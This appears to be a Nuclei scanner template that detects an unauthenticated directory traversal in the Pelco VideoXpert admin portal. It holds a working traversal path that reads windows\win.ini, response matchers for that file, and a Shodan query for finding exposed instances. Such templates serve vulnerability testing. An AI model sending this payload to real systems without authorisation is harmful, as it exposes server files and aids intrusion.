id: videoxpert-lfi

info:
  name: Schneider Electric Pelco VideoXpert Core Admin Portal - Directory Traversal
  author: 0x_akoko
  severity: high
  description: Pelco VideoXpert suffers from a directory traversal vulnerability. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server.
  reference:
    - https://packetstormsecurity.com/files/143317/Schneider-Electric-Pelco-VideoXpert-Core-Admin-Portal-Directory-Traversal.html
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php
  metadata:
    shodan-query: title:"VideoXpert"
  tags: schneider,pelco,packetstorm,lfi,videoxpert

requests:
  - method: GET
    path:
      - '{{BaseURL}}/portal//..\\\..\\\..\\\..\\\windows\win.ini'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'bit app support'
          - 'fonts'
          - 'extensions'
        condition: and

      - type: status
        status:
          - 200